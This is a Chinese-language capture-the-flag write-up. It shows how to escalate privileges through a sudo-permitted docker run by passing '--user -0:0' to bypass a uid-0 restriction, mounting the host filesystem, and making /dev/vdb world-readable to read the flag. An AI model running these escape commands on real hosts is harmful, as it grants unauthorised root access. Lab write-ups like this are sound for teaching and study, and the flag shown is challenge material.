修改一下telnet的端口配置，访问第二小问，sudo -l命令允许提权执行的命令：

发现多了这两个限制--security-opt=no-new-privileges，表明docker run命令必须带上--security-opt=no-new-privileges参数，这可以防止通过suid机制获取root权限，同时禁止了--device参数，无法从容器内读取flag

---

老样子，rz传输tar.gz文件并解压载入tar镜像：

rz

gunzip dockerfile.tar.gz

sudo docker image load < dockerfile.tar

---

了解到一个方法：

uid是整数型，整数的+0和-0就是一个东西，不让指定uid为0，那就指定为-0来绕过

sudo docker run --rm --security-opt=no-new-privileges -u 1000:1000 --user -0:0 -v /:/host -it dockerfile

cat /host/dev/vdb

成功获取到root shell，但在容器内，依旧不能读设备块

---

修改一下文件权限即可，再exit退出容器，cat /dev/vdb就可以成功获取flag了：

chmod 777 /host/dev/vdb

cat /dev/vdb

flag{contA1N3R_R0ot_i5_4cCESsIb1e_c692a7d2c6}